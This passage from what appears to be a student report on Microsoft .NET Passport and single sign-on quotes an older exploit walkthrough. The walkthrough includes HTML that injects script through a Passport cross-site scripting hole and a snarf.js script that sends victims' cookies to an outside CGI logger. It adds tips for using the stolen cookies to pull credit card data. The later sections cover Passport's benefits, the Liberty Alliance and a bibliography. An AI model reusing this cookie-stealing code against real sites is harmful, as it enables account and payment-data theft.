Hotmail domain.
Step Two: Setup A Couple of Frames
26
In Step One, we get the user's browser to load grabit.html. All grabit.html contains is:
<HTML><HEAD><TITLE>Wheeeee</TITLE>
<frameset rows="200,200">
<FRAME NAME="me1" SRC="https://register.passport.com/ppsecure/404please">
<FRAME
NAME="me2"
SRC="https://register.passport.com/reg.srf?ru=https://ww.passport.com/%22%3E%3CSCRIPT%2
0src='http://alive.znep.com/~marcs/passport/snarf.js'%3Ej%3C/SCRIPT%3E%3Flc%3D1033">
</FRAMESET>
</HTML>
This loads two frames. The top frame is under the /ppsecure path to allow us to steal the MSPSec
cookie. We don't actually have to do this for this exploit, but I'm throwing this in just to show how
trivial it is. The page doesn't exist, but that doesn't change anything.
The bottom frame exploits one of the passport.com cross site scripting holes. reg.srf, if you are
logged in, ends up loading a page saying you are already logged in that includes the ru parameter
without properly encoding it. At that time, snarf.js executes to actually steal the cookies.
Step Three: Stealing the Cookies
Now snarf.js is being executed in the security context of a page with a URL of
http://register.passport.com/alreadysignedin.srf.
The contents of snarf.js are quite simple:
s = new String(document.URL);
if (s.indexOf('http:') == 0) {
setTimeout('document.location="https:" + s.substring(5, s.length-1, 1000)');
} else {
document.location="http://alive.znep.com/~marcs/passport/snarf.cgi?cookies="
+
escape(parent.frames[0].document.cookie);
}
The only trick is that alreadysignedin.srf ends up being loaded as a non-SSL page, which is no
good since we can't access the SSL upper frame to grab the SSL-only MSPSec cookie, due to the
scripting security model. So that's no problem, we just reload the same page using SSL, at which
point our code executes again, and sends the cookies from the upper frame off to a CGI script that
just captures them to a log.
Part Four: So we have the cookies...
Congratulations, you have successfully stolen some cookies. You can then automate the rest of the
stealing of the Passport Wallet however you want. The easy way for demonstrations is to just copy
the cookies into a Netscape cookies file, and go from there. The easiest way to actually get the full
credit card numbers, etc. is to go to a Passport Express Purchase enabled store, go through the
checkout, and then many or most stores will show you all the information as part of the order page.
I'm sure you can figure out the other ways to automate it or grab it without actually involving any
merchant's site. Hint: the information is sent to the browser as part of a form that automatically
posts back to the merchant site using ECML.
27
7. Advantages of Passport
Although as we all see, the passport has so many risks, why we still like to use it?
Because we are simple users, because it benefit us!
Ease of use. Users can log in once and get authenticated access to all servers for which that user is
authorized, without being interrupted by repeated requests for passwords. It reduces the number of
passwords users must remember to one. This means it is extremely unlikely the user will forget
their password. Since all passwords are the same the user has less chance of forgetting their
password.
Password limited to local machine. To log in, the user types a single password that protects the
private-key database on the local machine. Passwords are not sent over the network.
Simplified Management. Administrators can control who is allowed access to which servers by
controlling the lists of certificate authorities maintained by client and server software. These lists
are shorter than lists of user names and passwords and don't change as often.
28
8. Business use (MS Passport)
8.1 Business use of Passport
Single sign-in. it allows users to create a single set of credentials that can be used to access any
site that supports a Passport service, which increase customer satisfaction by allowing website
visitors easy access without the frustration of repetitive registrations and forgotten passwords.
Kids Passport. The Kids Passport services offer tools to help businesses comply with the parental
consent provisions of certain children's privacy laws such as those in the U.S. Children's Online
Privacy Protection Act (COPPA). Parents can use the Kids Passport service to modify their
children's Passport profile information and choose a consent level to which participating Kids
Passport sites collect, use, and share children's personal information.*
8.2 Business Benefits of Passport
Passport offers several business benefits.
Save Time and Money Required to Build Authentication Systems
Passport reduces the need to build, host, and maintain authentication systems, enabling your
company to focus development resources on value-added features that will drive your business.
Passport also offers localization in more than 25 languages, which may further decrease your total
costs. In addition, fewer forgotten passwords can reduce your customer support expenses.
Offer 200 Million Passport Users Easy Access to Your Site
Passport simplifies sign-in and registration, lowering barriers for 200 million Passport account
holders to access your website. Providing users easy access without the burden of repetitive
registrations and forgotten passwords can help increase customer reach and satisfaction.
Increase Customer Loyalty with Easy, Dependable Personalization
Passport lets you personalize the Web experience of returning customers based on their unique
profiles. By offering personalized customization, you can build closer, more meaningful
relationships with your customers, and increase customer loyalty.
Maintain Your Branding with Flexible Customization
With Passport, you can tailor sign-in pages to match your site design, providing a seamless
experience for your customers.
Maintain Ownership and Control of Your Customer Data
Passport does not have access or visibility to any of your data. Passport is simply a technology that
helps you enable authenticated, user-centric services for your customers. The relationship between
your company and your customers belongs solely to you.
29
9. About the Liberty Alliance
“The Liberty Alliance Project is an alliance of more than 150 companies, non-profit and
government organizations from around the globe. The consortium is committed to developing an
open standard for federated network identity that supports all current and emerging network
devices. Federated identity offers businesses, governments, employees and consumers a more
convenient and secure way to control identity information in today are digital economy, and is a
key component in driving the use of e-commerce, personalized data services, as well as web-based
services. Membership is open to all commercial and non-commercial organizations.” xviii
Liberty Alliance and Passport are both primarily targeted at consumers and it will be awhile
before there will be significant web services use by consumers. Different from the Passport, the
Liberty neither definite a center certificate system, nor suggesting the users in cooperating
domains to move to the center certificate system. A one to many or many to many alliance relation
could be constituted between certificate system and cooperating domain, as the same as between
certificate systems.
The Liberty Alliance is pushing forward with its vision for an open-system single sign-on, which
are officials described as a federated-view solution. It plans to have personal information
controlled completely by the user, yet able to be securely shared with the organizations of the
users choosing, thus preventing any attacks, and erecting toll booths or impediments to
interoperability or service delivery.
Liberty version 1.0 is a very flexible certificate system criterion which buildup by Web
Redirection, Web Services, Metadata and Schemas. Theoretically, the organizations in Alliance
could extend boundless. But since the organizing mode is a bit disengaged, it will bring the
problems about the flexibility of the system and the management of the certification. The
efficiency of the certification still needs to be test through the spread of this alliance.
30
10. Conclusion
Password management can be a complex and frustrating task for end users, resulting in
compromised security and lost productivity. Single Sign-On enables users to login quickly and
securely to all their applications, websites and mainframe sessions with just one identity. It solves
your password management problems by eliminating the need for users to remember the myriad of
usernames and passwords beyond their initial network login.
From all of single sign-on system we focus mainly on the NET. Passport, as it is more popular and
common one nowadays. Most of us have the MSN Accounts. But not all of us know how it works
directly, that is also the main reason we choose this topic. Although the passport has security
weaknesses, such as Cookies problem, Key management, Passport Server attack and Hotmail
credential assignment, and it could easily be attacked if we pay less attention to protect it, it still
be used widely. The benefits of Passport are also obvious, as I show above, both for single user
and business.
Liberty Alliance aims at corporations rather than individuals, in contrast with Ms Passport. We
look forward to the cooperation and competition between Liberty Alliance and Microsoft may
promote the progress of single Sign in System.
31
Bibliography
[1] Microsoft .NET Passport Review Guide Microsoft.com Jan. 2004
[2] Telling Humans and Computer Apart Automatically Luis von Ahn Feb. 2004
[3] CAPTCHA: Using Hard AI Problems for Security Luis von Ahn
[4]XADM: How Secure Sockets Layer Works Microsoft.com Nov. 2004
[5]SSL(Secure Sockets Layer) http://www.nwfusion.com/details/473.html?def
[6]Risk of the Passport Single Signon Protocol AT&T Labs David and Aviel
Reference
i
www.cafesoft.com/support/security/glossary.html
ii
iv
http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.html
http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.html
“Comparing Password Synchronization with Protocom SecureLogin® Single Sign-on” white
paper by Protocom Development Systems October 1, 2004
v
http://java.sun.com/features/2002/05/single-signon.html
vi
www.zeroonesoftware.com/glossary.html
iii
http://www.bitpipe.com/detail/RES/1098809756_442.html?src=google
vii
http://www.oasis-open.org/committees/security/
Execute overview documentation,
http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security
ix
Execute overview documentation,
http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security
x Execute overview documentation,
http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security
xi Microsoft .NET Passport Review Guide
Microsoft Jan. 2004
xii Microsoft .NET Passport Review Guide
Microsoft Jan. 2004
xiii Telling Humans and Computers Apart Automatically
Luis von Ahn Feb. 2004
xiv Microsoft .NET Passport Review Guide
Microsoft Jan. 2004
xv Microsoft .NET Passport Review Guide
Microsoft Jan. 2004
xvi XADM: How Secure Sockets Layer Works
Microsoft.com Nov. 2004
xvii Passport white paper
xviii http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.html
xviiiI http://www.projectliberty.org/about/index.php
viii
32
